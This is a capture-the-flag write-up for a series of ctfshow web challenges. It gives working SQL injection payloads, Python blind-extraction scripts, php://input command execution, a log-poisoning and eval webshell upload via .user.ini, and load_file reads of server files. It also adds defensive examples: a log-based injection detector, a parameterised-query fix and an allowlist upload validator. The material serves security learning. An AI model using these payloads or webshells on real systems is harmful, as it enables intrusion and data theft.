This article, collected and organized by 大佬教程, walks through a set of ctfshow-web challenges and is shared here for reference.
web sign-in challenge
web2
web3
web4
web5
web6
web7
web8
web9
Wrong approach
Correct approach
web10
web11
web12
web13
web14
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
Dump the column names:
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=`flag`#
Query the data:
1' union select 1,flag,3 from flag#
?url=php://input
POST: <?php system("ls");?>
We get a flag file.
?url=php://input
POST: <?php system("cat <file>");?>
?url=/var/log/nginx/access.log
Then we put a one-line webshell in the User-Agent header
and connect with AntSword (蚁剑).
<?php
$flag="";
$v1=$_GET['v1'];
$v2=$_GET['v2'];
if(isset($v1) && isset($v2)){
    if(!ctype_alpha($v1)){
        die("v1 error");
    }
    if(!is_numeric($v2)){
        die("v2 error");
    }
    if(md5($v1)==md5($v2)){
        echo $flag;
    }
}else{
    echo "where is flag?";
}
?>
ctype_alpha(): checks whether a variable consists only of letters
is_numeric(): checks whether a variable is a numeric string
This one is simple: we just need one pure-digit string and one pure-letter string whose md5 hashes both start with 0e, because PHP's == then compares them as the number 0.
?v2=240610708&v1=EEIZDOI
Below is a collected list of letter-only and digit-only strings whose md5 value starts with 0e (string, then its md5):
QLTHNDT 0e405967825401955372549139051580
QNKCDZO 0e830400451993494058024219903391
EEIZDOI 0e782601363539291779881938479162
TUFEPMC 0e839407194569345277863905212547
UTIPEZQ 0e382098788231234954670291303879
UYXFLOI 0e552539585246568817348686838809
IHKFRNS 0e256160682445802696926137988570
PJNPDWY 0e291529052894702774557631701704
ABJIHVY 0e755264355178451322893275696586
DQWRASX 0e742373665639232907775599582643
DYAXWCA 0e424759758842488633464374063001
GEGHBXL 0e248776895502908863709684713578
GGHMVOE 0e362766013028313274586933780773
GZECLQZ 0e537612333747236407713628225676
NWWKITQ 0e763082070976038347657360817689
NOOPCJF 0e818888003657176127862245791911
MAUXXQC 0e478478466848439040434801845361
MMHUWUV 0e701732711630150438129209816536
240610708 0e462097431906509019562988736854
314282422 0e990995504821699494520356953734
571579406 0e972379832854295224118025748221
903251147 0e174510503823932942361353209384
1110242161 0e435874558488625891324861198103
1320830526 0e912095958985483346995414060832
1586264293 0e622743671155995737639662718498
2302756269 0e250566888497473798724426794462
2427435592 0e067696952328669732475498472343
2653531602 0e877487522341544758028810610885
3293867441 0e471001201303602543921144570260
3295421201 0e703870333002232681239618856220
3465814713 0e258631645650999664521705537122
3524854780 0e507419062489887827087815735195
3908336290 0e807624498959190415881248245271
4011627063 0e485805687034439905938362701775
4775635065 0e998212089946640967599450361168
4790555361 0e643442214660994430134492464512
5432453531 0e512318699085881630861890526097
5579679820 0e877622011730221803461740184915
5585393579 0e664357355382305805992765337023
6376552501 0e165886706997482187870215578015
7124129977 0e500007361044747804682122060876
7197546197 0e915188576072469101457315675502
7656486157 0e451569119711843337267091732412
admin' or 1=1#   // error
admin'/**/or/**/1=1#   // works
Let's begin~~
admin'/**/or/**/1=1/**/order/**/by/**/3#
admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#
admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#
admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema="flag"#
admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#
import requests

url = "http://ef1aa69c-3250-414b-9468-0c03efbfbd6f.chall.ctf.show/?id='/**/"
result = ''
i = 0
while True:
    i = i + 1
    # binary search over printable ASCII for the i-th character
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)' % (i, mid)
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flag")),{i},1))>{mid},1,0)'
        payload = f'if(ascii(substr((select/**/(flag)from(flag)),{i},1))>{mid},1,0)'
        r = requests.get(url + payload)
        if "by Rudyard Kipling" in r.text:   # true branch: the page shows the poem
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break   # no more characters
print(result)
import requests

url = "http://a448d26a-b594-47a1-b3e0-fddbe1d869ba.chall.ctf.show/?id=-1/**/or/**/"
result = ''
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # substr(... from i for 1) avoids the comma, which is filtered here
        # payload = f'ascii(substr(database()/**/from/**/{i}/**/for/**/1))>{mid}#'
        # payload = f'ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))/**/from/**/{i}/**/for/**/1))>{mid}'
        # payload = f'ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flag"))/**/from/**/{i}/**/for/**/1))>{mid}'
        payload = f'ascii(substr((select/**/(flag)from(flag))/**/from/**/{i}/**/for/**/1))>{mid}'
        r = requests.get(url + payload)
        if "by Rudyard Kipling" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
print(result)
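From the defender's side, the two scripts above have a very recognisable footprint: one request per comparison step, all from the same client, each carrying ascii(substr(...)) with /**/ in place of spaces. The following added Python example (my own, not part of the writeup) parses nginx "combined" access-log lines, normalises the request path (URL decoding, inline comments to spaces), tags the injection indicators seen in this writeup, and reports clients with a burst of flagged requests. The log lines are constructed for the example and the indicator names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed nginx "combined" log lines modelled on the probing scripts above
# (not real traffic): 10.0.0.9 runs a boolean-based blind probe, 10.0.0.7 tries
# a union/load_file query, 10.0.0.5 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=%27/**/if(ascii(substr((select/**/(flag)from(flag)),1,1))%3E79,1,0) HTTP/1.1" 200 2048 "-" "python-requests/2.31"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=%27/**/if(ascii(substr((select/**/(flag)from(flag)),1,1))%3E103,1,0) HTTP/1.1" 200 2048 "-" "python-requests/2.31"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=%27/**/if(ascii(substr((select/**/(flag)from(flag)),1,1))%3E91,1,0) HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?query=-1/**/union/**/select/**/load_file(%27/real_flag_is_here%27) HTTP/1.1" 200 900 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /static/app.js HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Indicator name -> pattern applied to the normalised request path.
INDICATORS = {
    "blind_ascii_substr": re.compile(r"ascii\s*\(\s*substr\s*\("),
    "union_select": re.compile(r"union\s+select"),
    "information_schema": re.compile(r"information_schema"),
    "load_file": re.compile(r"load_file\s*\("),
    "time_sleep": re.compile(r"sleep\s*\("),
    "with_rollup": re.compile(r"with\s+rollup"),
}


def normalize_path(raw_path: str) -> str:
    """Undo the two evasions used above: URL encoding and /**/ instead of spaces."""
    decoded = unquote_plus(raw_path)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # inline comment -> one space
    return re.sub(r"\s+", " ", decoded).lower()


def sqli_indicators(raw_path: str):
    """Names of the indicators that fire for one request path (may be empty)."""
    norm = normalize_path(raw_path)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def analyze(log_text: str) -> Counter:
    """Number of flagged requests per client IP."""
    hits = Counter()
    for line in log_text.splitlines():
        m = _LINE.match(line)
        if m and sqli_indicators(m.group("path")):
            hits[m.group("ip")] += 1
    return hits


def flag_sources(hits: Counter, threshold: int = 2):
    """Blind extraction needs one request per comparison, so it shows up as a
    burst of flagged requests from one source; single hits are left for review."""
    return sorted(ip for ip, n in hits.items() if n >= threshold)


if __name__ == "__main__":
    counts = analyze(SAMPLE_LOG)
    print(dict(counts), flag_sources(counts))
```

The normalisation step matters more than the pattern list: the scripts above deliberately avoid spaces and commas, so a rule that looks for "union select" in the raw line misses them, while matching after decoding and comment stripping catches the same requests.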
<?php
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
    die("password error");
}
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
    while($row=mysqli_fetch_assoc($result)){
        echo "登陆成功<br>";
        echo $flag;
    }
}
?>
The key line is this one:
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'"
With the second argument set to true, md5() returns the raw binary digest instead of hex; spliced into the query as a string, the raw bytes of the right password's digest contain 'or'6, so the query becomes:
select * from admin where pass=''or'6...'
Two such strings are known online:
ffifdyop, 129581926211651571912466741651878684928
And because the length is limited, entering ffifdyop gets the flag.
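To see exactly what the raw digest does to the query, here is an added Python example (mine, not the challenge's code) that mirrors the concatenation from the source above against an in-memory SQLite table, shows the 'or'6 prefix, and contrasts it with a parameterised query in which the digest bytes can never be parsed as SQL. The table contents, the stored password and the function names are constructed for the example; the only page-derived values are the query shape, the 10-character limit and the input ffifdyop.

```python
import hashlib
import sqlite3

MAX_LEN = 10  # the strlen($password)>10 limit from the source above


def raw_md5_as_php_string(password: str) -> str:
    """md5($password, true) yields 16 raw bytes which PHP splices into the SQL
    text byte for byte. Decoding as latin-1 maps each byte to one character,
    so this Python str contains what the PHP string contains."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")


def injected_prefix(password: str, n: int = 5) -> str:
    """The leading bytes of the raw digest, i.e. what lands right after password ='."""
    return raw_md5_as_php_string(password)[:n]


def vulnerable_query(password: str) -> str:
    """Same concatenation as the challenge source (a constructed mirror of it)."""
    if len(password) > MAX_LEN:
        raise ValueError("password error")
    return ("select * from user where username ='admin' and password ='"
            + raw_md5_as_php_string(password) + "'")


def _demo_db() -> sqlite3.Connection:
    # In-memory stand-in for the MySQL table; the stored hash is the raw md5 of
    # a constructed, unrelated password.
    con = sqlite3.connect(":memory:")
    con.execute("create table user(username text, password text)")
    con.execute("insert into user values (?, ?)",
                ("admin", raw_md5_as_php_string("correct horse")))
    return con


def login_vulnerable(password: str) -> int:
    """Rows returned by the concatenated query. For ffifdyop the WHERE clause
    reads ... and password =''or'6...', and the string '6...' is truthy, so
    every row matches."""
    con = _demo_db()
    try:
        return len(con.execute(vulnerable_query(password)).fetchall())
    finally:
        con.close()


def login_parameterized(password: str) -> int:
    """Fix: bind the digest as a parameter (mysqli prepared statement in PHP),
    or compare the hex digest instead of raw bytes."""
    con = _demo_db()
    try:
        return len(con.execute(
            "select * from user where username = ? and password = ?",
            ("admin", raw_md5_as_php_string(password))).fetchall())
    finally:
        con.close()


if __name__ == "__main__":
    print(repr(injected_prefix("ffifdyop")))
    print(login_vulnerable("ffifdyop"),
          login_parameterized("ffifdyop"),
          login_parameterized("correct horse"))
```

The length limit and the md5 step give a false sense of safety here: the injected characters never appear in the input, they appear in the digest, so input filtering cannot catch them and only parameter binding (or a hex digest) removes the problem.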
<?php
$flag="";
function replaceSpecialChar($strParam){
    $regex = "/(select|from|where|join|sleep|and|s|union|,)/i";
    return preg_replace($regex,"",$strParam);
}
if (!$con)
{
    die('Could not connect: ' . mysqli_error());
}
if(strlen($username)!=strlen(replaceSpecialChar($username))){
    die("sql inject error");
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
    die("sql inject error");
}
$sql="select * from user where username = '$username'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
    while($row=mysqli_fetch_assoc($result)){
        if($password==$row['password']){
            echo "登陆成功<br>";
            echo $flag;
        }
    }
}
?>
Source: the POSTed data is filtered, and the value queried from the database must equal the password we POST. We use a WITH ROLLUP bypass.
WITH ROLLUP adds a further summary over the GROUP BY result. In `group by <column> with rollup`, when the grouped column's values differ, an extra row is generated whose grouping column is NULL; and even if the query result is a single row, a row with the grouping column set to NULL is still generated.
'or/**/1=1/**/GROUP/**/BY/**/password/**/WITH/**/ROLLUP/**/LIMIT/**/1/**/OFFSET/**/1#
Because with rollup adds a row whose password is NULL, we only need to submit an empty password so that the comparison (NULL == NULL) holds.
<?php
function replaceSpecialChar($strParam){
    $regex = "/(select|from|where|join|sleep|and|s|union|,)/i";
    return preg_replace($regex,"",$strParam);
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
    die("sql inject error");
}
if($password==$_SESSION['password']){
    echo $flag;
}else{
    echo "error";
}
?>
Here we can see that a lot is filtered out, and the challenge requires
the input box content to equal the session content:
if($password==$_SESSION['password']){
We can delete the PHPSESSID cookie so that the session value becomes empty, then submit an empty password directly and the two are equal.
PHP's glob() function returns the file names or directories matching the given pattern.
glob("*") matches any file
glob("*.txt") matches files with the .txt suffix
We can use this to print the files in the current directory.
Input:
?cmd=print_r(glob("*"));
We find a file, then display it with highlight_file:
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
Got the flag.
upload.php.bak gives us the source; a .bak file is a backup. Other source-leak vectors: .hg source leak, .git source leak, .DS_Store file leak, .phps, and pages ending in .bak.
<?php
header("content-type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];
$temp_name = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
$arr = pathinfo($filename);
$ext_suffix = $arr['extension'];
if ($size > 24){
    die("error file zise");
}
if (strlen($filename)>9){
    die("error file name");
}
if(strlen($ext_suffix)>3){
    die("error suffix");
}
if(preg_match("/php/i",$ext_suffix)){
    die("error suffix");
}
if(preg_match("/php/i",$filename)){
    die("error file name");
}
if (move_uploaded_file($temp_name, './'.$filename)){
    echo "文件上传成功!";
}else{
    echo "文件上传失败!";
}
?>
We upload a one-line webshell. The file size must be less than 24 bytes, the name shorter than 9 characters, the suffix at most 3 characters, and the name must not contain php.
So we construct a one-line webshell 1.txt with the following content:
<?php eval($_GET['a']);
Upload succeeds~ Then we upload a .user.ini containing:
auto_prepend_file=1.txt
Its effect is to have the txt file processed as PHP.
I tried connecting with AntSword here but it would not connect, so we query directly from the page:
a=print_r(glob("*"));
We got the file; use highlight_file again to view it:
a=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
Got the flag.
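The upload filter above is a blocklist, and .user.ini slips through every check: nine characters, a three-letter extension, no "php" anywhere. The following added Python example (mine, not the challenge's or anyone's project code) reproduces those checks, shows that 1.txt and .user.ini both pass them, and puts an allowlist-based validator beside them that rejects dotfiles, double extensions and non-allowlisted types and never reuses the client's file name on disk. The extension allowlist and the function names are this example's own assumptions.

```python
import re
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "txt"}   # hypothetical allowlist for this demo
MAX_SIZE = 24
MAX_NAME = 9


def php_extension(filename: str) -> str:
    """pathinfo($f)['extension']: text after the last dot ('.user.ini' -> 'ini')."""
    return filename.rpartition(".")[2] if "." in filename else ""


def weak_check(filename: str, size: int) -> bool:
    """The checks from the upload.php source above, reproduced in Python."""
    ext = php_extension(filename)
    if size > MAX_SIZE or len(filename) > MAX_NAME:
        return False
    if len(ext) > 3 or re.search("php", ext, re.I) or re.search("php", filename, re.I):
        return False
    return True


# <base>.<ext>, plain ASCII, exactly one dot: no leading dot, no a.php.txt style names
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}$")


def hardened_check(filename: str, size: int, max_size: int = MAX_SIZE):
    """Allowlist instead of blocklist. Returns (accepted, reason)."""
    if size > max_size:
        return False, "too large"
    if filename.startswith("."):
        return False, "dotfile (server config such as .user.ini/.htaccess)"
    if not _SAFE_NAME.fullmatch(filename):
        return False, "name must be <base>.<ext> with plain ASCII characters"
    ext = php_extension(filename).lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not in allowlist"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Never store under the client's name: random base plus the allowlisted
    extension. Pair this with an upload directory outside the web root, or one
    where the server executes no scripts and honours no per-directory config."""
    ok, reason = hardened_check(filename, 0)
    if not ok:
        raise ValueError(reason)
    return f"{secrets.token_hex(8)}.{php_extension(filename).lower()}"


if __name__ == "__main__":
    for name in ("1.txt", ".user.ini", "a.php"):
        print(name, weak_check(name, 20), hardened_check(name, 20))
    print(storage_name("1.txt"))
```

The weak filter fails because it asks "does the name look dangerous?", which .user.ini does not; the hardened one asks "does the name look exactly like something we allow?", and a leading dot or a second extension is simply not on that list.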
<?php
include("secret.php");
if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}
highlight_file(__FILE__);
Clearly, passing ?c=3 hits a case with no break, so execution falls through into the next case and prints the url:
here_1s_your_f1ag.php
After going there we find an injection challenge; look at the source:
if(preg_match('/information_schema.tables|information_schema.columns|linestring| |polygon/is', $_GET['query'])){
    die('@A@');}
Dump the database as before:
?query=-1/**/union/**/select/**/database()
Then dump the tables (note: since some keywords are filtered, we can use backticks to bypass the filter):
table -> `table`
query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()
Dump the column names:
query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content'
Dump the values:
query=-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content
No flag, but a hint points to secret.php.
MySQL provides load_file() for reading local files:
?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')
The source is as follows:
<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
    echo file_get_contents('/real_flag_is_here');
}
We can read '/real_flag_is_here' directly:
?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')
Got the flag.